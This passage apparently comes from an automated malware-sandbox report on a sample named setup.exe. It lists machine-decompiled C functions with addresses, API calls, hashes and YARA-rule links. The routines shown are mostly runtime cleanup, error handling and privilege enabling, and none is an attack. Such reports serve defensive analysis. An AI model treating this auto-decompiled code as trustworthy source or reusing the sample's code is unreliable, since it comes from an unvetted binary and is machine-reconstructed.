                                                                                                                                                    • Instruction Fuzzy Hash: 800184F6B21216BF77315E7A7C8DC7B6E6DDEC6BA13150229BB05C6284DA61CD0182B0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01238EA9, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E01238EA9(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x124d6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E01238429(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E0123A4F1(_t13, _t17, __eflags,  *0x124d6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E01238C96(_t13, _t16, 0x1270288);
							E0123835E(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E0123835E();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E0123A49B(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                                                                                                                                                    0x01238ea9
                                                                                                                                                    0x01238eb4
                                                                                                                                                    0x01238eb6
                                                                                                                                                    0x01238eb8
                                                                                                                                                    0x01238ebd
                                                                                                                                                    0x01238ec0
                                                                                                                                                    0x01238ece
                                                                                                                                                    0x01238eda
                                                                                                                                                    0x01238edd
                                                                                                                                                    0x01238ee0
                                                                                                                                                    0x01238ef2
                                                                                                                                                    0x01238ef7
                                                                                                                                                    0x01238ef9
                                                                                                                                                    0x01238f04
                                                                                                                                                    0x01238f0a
                                                                                                                                                    0x01238f12
                                                                                                                                                    0x01238f14
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238efb
                                                                                                                                                    0x01238efb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238efb
                                                                                                                                                    0x01238ee2
                                                                                                                                                    0x01238ee2
                                                                                                                                                    0x01238ee3
                                                                                                                                                    0x01238ee3
                                                                                                                                                    0x01238f16
                                                                                                                                                    0x01238f17
                                                                                                                                                    0x01238f17
                                                                                                                                                    0x01238ec2
                                                                                                                                                    0x01238ec8
                                                                                                                                                    0x01238ecc
                                                                                                                                                    0x01238f1f
                                                                                                                                                    0x01238f20
                                                                                                                                                    0x01238f26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01238ecc
                                                                                                                                                    0x01238f2d

                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,012387DF,0123847B,?,01238E53,00000001,00000364,?,012336CF,?,?,0124FF50), ref: 01238EAE
                                                                                                                                                    • _free.LIBCMT ref: 01238EE3
                                                                                                                                                    • _free.LIBCMT ref: 01238F0A
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,0124FF50), ref: 01238F17
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,0124FF50), ref: 01238F20
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                    • Opcode ID: b6200bfd8efbbf3bbbfbc757cc9dfe62d2a4f9bb513084d047c103cde53f66cf
                                                                                                                                                    • Instruction ID: fec7862779d61819657c6ca369d63096a2e1fee4982479788aafac3e270357d4
                                                                                                                                                    • Opcode Fuzzy Hash: b6200bfd8efbbf3bbbfbc757cc9dfe62d2a4f9bb513084d047c103cde53f66cf
                                                                                                                                                    • Instruction Fuzzy Hash: FA01F9FA1356036BD72366697C4CD3B25ABEBE16717210728F705AA286DE6084024224
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012206B9, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E012206B9(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E01241E4C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E012209A1(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E012207AC(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











                                                                                                                                                    0x012206b9
                                                                                                                                                    0x012206c2
                                                                                                                                                    0x012206c4
                                                                                                                                                    0x012206c9
                                                                                                                                                    0x012206ca
                                                                                                                                                    0x012206d4
                                                                                                                                                    0x012206d6
                                                                                                                                                    0x012206db
                                                                                                                                                    0x012206dd
                                                                                                                                                    0x012206ed
                                                                                                                                                    0x012206f9
                                                                                                                                                    0x012206fb
                                                                                                                                                    0x012206fe
                                                                                                                                                    0x01220700
                                                                                                                                                    0x01220707
                                                                                                                                                    0x0122070d
                                                                                                                                                    0x0122070e
                                                                                                                                                    0x01220711
                                                                                                                                                    0x012206fe
                                                                                                                                                    0x01220720
                                                                                                                                                    0x0122072c
                                                                                                                                                    0x01220738
                                                                                                                                                    0x01220743
                                                                                                                                                    0x0122074e

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 012209A1: ResetEvent.KERNEL32(?), ref: 012209B3
                                                                                                                                                      • Part of subcall function 012209A1: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 012209C7
                                                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 012206ED
                                                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 01220707
                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 01220720
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0122072C
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01220738
                                                                                                                                                      • Part of subcall function 012207AC: WaitForSingleObject.KERNEL32(?,000000FF,012208CB,?,?,0122094F,?,?,?,?,?,01220939), ref: 012207B2
                                                                                                                                                      • Part of subcall function 012207AC: GetLastError.KERNEL32(?,?,0122094F,?,?,?,?,?,01220939), ref: 012207BE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1868215902-0
                                                                                                                                                    • Opcode ID: 3c9627c51898a70d075694216f3f7e321dd3e41bac92cc76d360893ddea3247c
                                                                                                                                                    • Instruction ID: a2c616042356aaf38541785fc7df9bfcbcaaf54bd9bd0ae6f980df56b30b8a52
                                                                                                                                                    • Opcode Fuzzy Hash: 3c9627c51898a70d075694216f3f7e321dd3e41bac92cc76d360893ddea3247c
                                                                                                                                                    • Instruction Fuzzy Hash: B901B176050714EFC7329F6AEC88FDABBEAFB58B10F000529F16A82154CB766944CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123BDDF, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0123BDDF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x124dd50; // 0x124dd44
					if(_t23 != 0) {
						E0123835E(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x124dd54; // 0x12706fc
					if(_t24 != 0) {
						E0123835E(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x124dd58; // 0x12706fc
					if(_t25 != 0) {
						E0123835E(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x124dd80; // 0x124dd48
					if(_t26 != 0) {
						E0123835E(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x124dd84; // 0x1270700
					if(_t27 != 0) {
						return E0123835E(_t6);
					}
				}
				return _t6;
			}










                                                                                                                                                    0x0123bde5
                                                                                                                                                    0x0123bdea
                                                                                                                                                    0x0123bdee
                                                                                                                                                    0x0123bdf4
                                                                                                                                                    0x0123bdf7
                                                                                                                                                    0x0123bdfc
                                                                                                                                                    0x0123be00
                                                                                                                                                    0x0123be06
                                                                                                                                                    0x0123be09
                                                                                                                                                    0x0123be0e
                                                                                                                                                    0x0123be12
                                                                                                                                                    0x0123be18
                                                                                                                                                    0x0123be1b
                                                                                                                                                    0x0123be20
                                                                                                                                                    0x0123be24
                                                                                                                                                    0x0123be2a
                                                                                                                                                    0x0123be2d
                                                                                                                                                    0x0123be32
                                                                                                                                                    0x0123be33
                                                                                                                                                    0x0123be36
                                                                                                                                                    0x0123be3c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123be44
                                                                                                                                                    0x0123be3c
                                                                                                                                                    0x0123be47

                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0123BDF7
                                                                                                                                                      • Part of subcall function 0123835E: RtlFreeHeap.NTDLL(00000000,00000000,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?), ref: 01238374
                                                                                                                                                      • Part of subcall function 0123835E: GetLastError.KERNEL32(?,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?,?), ref: 01238386
                                                                                                                                                    • _free.LIBCMT ref: 0123BE09
                                                                                                                                                    • _free.LIBCMT ref: 0123BE1B
                                                                                                                                                    • _free.LIBCMT ref: 0123BE2D
                                                                                                                                                    • _free.LIBCMT ref: 0123BE3F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 5a1dded7cc9ea671145f7af346ded5663a06854c079855840cfca40a987fbe8b
                                                                                                                                                    • Instruction ID: 7b0743d801c95c1c6b50ba9797da911c84b05fc35a425ef2a047520f0627325f
                                                                                                                                                    • Opcode Fuzzy Hash: 5a1dded7cc9ea671145f7af346ded5663a06854c079855840cfca40a987fbe8b
                                                                                                                                                    • Instruction Fuzzy Hash: 93F018B3625205E7DA30DF9CF589D2677D9BA947207580C05F35CDB514CB31F84087A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01237E80, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E01237E80(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x124dd40; // 0x10e1358
					if(_t7 != 0x124db20) {
						E0123835E(_t7);
						 *0x124dd40 = 0x124db20;
					}
				}
				E0123835E( *0x1270280);
				 *0x1270280 = 0;
				E0123835E( *0x1270284);
				 *0x1270284 = 0;
				E0123835E( *0x12706d0);
				 *0x12706d0 = 0;
				E0123835E( *0x12706d4);
				 *0x12706d4 = 0;
				return 1;
			}




                                                                                                                                                    0x01237e89
                                                                                                                                                    0x01237e8d
                                                                                                                                                    0x01237e8f
                                                                                                                                                    0x01237e9b
                                                                                                                                                    0x01237e9e
                                                                                                                                                    0x01237ea4
                                                                                                                                                    0x01237ea4
                                                                                                                                                    0x01237e9b
                                                                                                                                                    0x01237eb0
                                                                                                                                                    0x01237ebd
                                                                                                                                                    0x01237ec3
                                                                                                                                                    0x01237ece
                                                                                                                                                    0x01237ed4
                                                                                                                                                    0x01237edf
                                                                                                                                                    0x01237ee5
                                                                                                                                                    0x01237eed
                                                                                                                                                    0x01237ef6

                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 01237E9E
                                                                                                                                                      • Part of subcall function 0123835E: RtlFreeHeap.NTDLL(00000000,00000000,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?), ref: 01238374
                                                                                                                                                      • Part of subcall function 0123835E: GetLastError.KERNEL32(?,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?,?), ref: 01238386
                                                                                                                                                    • _free.LIBCMT ref: 01237EB0
                                                                                                                                                    • _free.LIBCMT ref: 01237EC3
                                                                                                                                                    • _free.LIBCMT ref: 01237ED4
                                                                                                                                                    • _free.LIBCMT ref: 01237EE5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: ba78e79fe0413e65f2c9d006a1f86b30c879897a120a59c3844b6f89cf85f2ab
                                                                                                                                                    • Instruction ID: b1603cd97166eff4043a3df6ada9545d610273407d10b0ab89cc2506e2276eff
                                                                                                                                                    • Opcode Fuzzy Hash: ba78e79fe0413e65f2c9d006a1f86b30c879897a120a59c3844b6f89cf85f2ab
                                                                                                                                                    • Instruction Fuzzy Hash: 08F05EFB9222268F8F756F19F9595263BA1F7A67207150606F100AA3A8C73218069B8C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012374E3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E012374E3(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0123B110(_t52);
					GetModuleFileNameA(0, 0x1270128, 0x104);
					_t49 =  *0x12706d8; // 0x10c33d8
					 *0x12706e0 = 0x1270128;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x1270128;
					}
					_v8 = 0;
					_v16 = 0;
					E01237607(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E0123777C(_v8, _v16, 1);
					if(_t64 != 0) {
						E01237607(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0123AC23(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x12706cc = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x12706d0 = _t59;
									L16:
									E0123835E(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x12706cc = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x12706d0 = _t43;
						goto L10;
					} else {
						_t44 = E012387DA();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E0123835E(_t64);
						return _t50;
					}
				} else {
					_t45 = E012387DA();
					_t65 = 0x16;
					 *_t45 = _t65;
					E012386B9();
					return _t65;
				}
			}





















                                                                                                                                                    0x012374e3
                                                                                                                                                    0x012374f0
                                                                                                                                                    0x01237510
                                                                                                                                                    0x01237523
                                                                                                                                                    0x01237529
                                                                                                                                                    0x0123752f
                                                                                                                                                    0x01237537
                                                                                                                                                    0x0123753e
                                                                                                                                                    0x0123753e
                                                                                                                                                    0x01237543
                                                                                                                                                    0x0123754a
                                                                                                                                                    0x01237551
                                                                                                                                                    0x01237563
                                                                                                                                                    0x0123756a
                                                                                                                                                    0x01237589
                                                                                                                                                    0x01237595
                                                                                                                                                    0x012375b0
                                                                                                                                                    0x012375b3
                                                                                                                                                    0x012375ba
                                                                                                                                                    0x012375c0
                                                                                                                                                    0x012375c7
                                                                                                                                                    0x012375ca
                                                                                                                                                    0x012375cc
                                                                                                                                                    0x012375d0
                                                                                                                                                    0x012375da
                                                                                                                                                    0x012375da
                                                                                                                                                    0x012375dc
                                                                                                                                                    0x012375e2
                                                                                                                                                    0x012375e5
                                                                                                                                                    0x012375e7
                                                                                                                                                    0x012375ed
                                                                                                                                                    0x012375ee
                                                                                                                                                    0x012375f4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012375d2
                                                                                                                                                    0x012375d2
                                                                                                                                                    0x012375d2
                                                                                                                                                    0x012375d5
                                                                                                                                                    0x012375d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012375d2
                                                                                                                                                    0x012375c2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012375c2
                                                                                                                                                    0x0123759b
                                                                                                                                                    0x012375a0
                                                                                                                                                    0x012375a2
                                                                                                                                                    0x012375a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123756c
                                                                                                                                                    0x0123756c
                                                                                                                                                    0x01237571
                                                                                                                                                    0x01237573
                                                                                                                                                    0x01237574
                                                                                                                                                    0x012375a9
                                                                                                                                                    0x012375a9
                                                                                                                                                    0x012375f7
                                                                                                                                                    0x012375f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01237601
                                                                                                                                                    0x012374f8
                                                                                                                                                    0x012374f8
                                                                                                                                                    0x012374ff
                                                                                                                                                    0x01237500
                                                                                                                                                    0x01237502
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01237507

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe,00000104), ref: 01237523
                                                                                                                                                    • _free.LIBCMT ref: 012375EE
                                                                                                                                                    • _free.LIBCMT ref: 012375F8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
                                                                                                                                                    • API String ID: 2506810119-276361667
                                                                                                                                                    • Opcode ID: 0544cab8828ad07784546f2e7448d2141730ba99f0ccc68907e249b01d1ff576
                                                                                                                                                    • Instruction ID: 1a99f53dba2343100aec861d6c5ba63b689d438bcd0e528fce0673f53ff55215
                                                                                                                                                    • Opcode Fuzzy Hash: 0544cab8828ad07784546f2e7448d2141730ba99f0ccc68907e249b01d1ff576
                                                                                                                                                    • Instruction Fuzzy Hash: 823184F1A14259AFDF26DF99E8849AFBBFCEBD5310F204166F90497250D6708A44CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121754D, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                    			E0121754D(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E0122E0E4(E01241D77, _t61);
				E0122E1C0();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E01213B26( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0x124feb2 == 0) {
						if(E01217BCE(L"SeSecurityPrivilege") != 0) {
							 *0x124feb1 = 1;
						}
						E01217BCE(L"SeRestorePrivilege");
						 *0x124feb2 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0x124feb1 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0x1271000() == 0) {
						if(E0121B5AC( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E01217032(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E01232DC0(_t32);
							if(_t32 == 5 && E0121FF7D() == 0) {
								E0121159C(_t61 - 0x6c, 0x18);
								E01220D97(_t61 - 0x6c);
							}
							E01216F5B(0x124ff50, 1);
						} else {
							_t39 =  *0x1271000(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E012115D1(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}












                                                                                                                                                    0x0121754d
                                                                                                                                                    0x0121754d
                                                                                                                                                    0x0121754d
                                                                                                                                                    0x01217552
                                                                                                                                                    0x0121755c
                                                                                                                                                    0x01217564
                                                                                                                                                    0x01217567
                                                                                                                                                    0x0121756a
                                                                                                                                                    0x0121756d
                                                                                                                                                    0x01217570
                                                                                                                                                    0x01217573
                                                                                                                                                    0x01217578
                                                                                                                                                    0x01217579
                                                                                                                                                    0x0121757a
                                                                                                                                                    0x01217580
                                                                                                                                                    0x01217588
                                                                                                                                                    0x01217595
                                                                                                                                                    0x012175a3
                                                                                                                                                    0x012175a5
                                                                                                                                                    0x012175a5
                                                                                                                                                    0x012175b1
                                                                                                                                                    0x012175b6
                                                                                                                                                    0x012175b6
                                                                                                                                                    0x012175c4
                                                                                                                                                    0x012175c7
                                                                                                                                                    0x012175c8
                                                                                                                                                    0x012175cc
                                                                                                                                                    0x012175cc
                                                                                                                                                    0x012175cd
                                                                                                                                                    0x012175ce
                                                                                                                                                    0x012175d1
                                                                                                                                                    0x012175d2
                                                                                                                                                    0x012175d3
                                                                                                                                                    0x012175de
                                                                                                                                                    0x012175f6
                                                                                                                                                    0x0121760b
                                                                                                                                                    0x01217614
                                                                                                                                                    0x01217619
                                                                                                                                                    0x01217628
                                                                                                                                                    0x01217630
                                                                                                                                                    0x01217640
                                                                                                                                                    0x01217648
                                                                                                                                                    0x01217648
                                                                                                                                                    0x01217651
                                                                                                                                                    0x012175f8
                                                                                                                                                    0x01217601
                                                                                                                                                    0x01217607
                                                                                                                                                    0x01217609
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01217609
                                                                                                                                                    0x012175f6
                                                                                                                                                    0x01217657
                                                                                                                                                    0x0121765b
                                                                                                                                                    0x01217664
                                                                                                                                                    0x0121766e

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 01217552
                                                                                                                                                      • Part of subcall function 01213B26: __EH_prolog.LIBCMT ref: 01213B2B
                                                                                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 01217619
                                                                                                                                                      • Part of subcall function 01217BCE: GetCurrentProcess.KERNEL32(00000020,?), ref: 01217BDD
                                                                                                                                                      • Part of subcall function 01217BCE: GetLastError.KERNEL32 ref: 01217C23
                                                                                                                                                      • Part of subcall function 01217BCE: CloseHandle.KERNEL32(?), ref: 01217C32
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
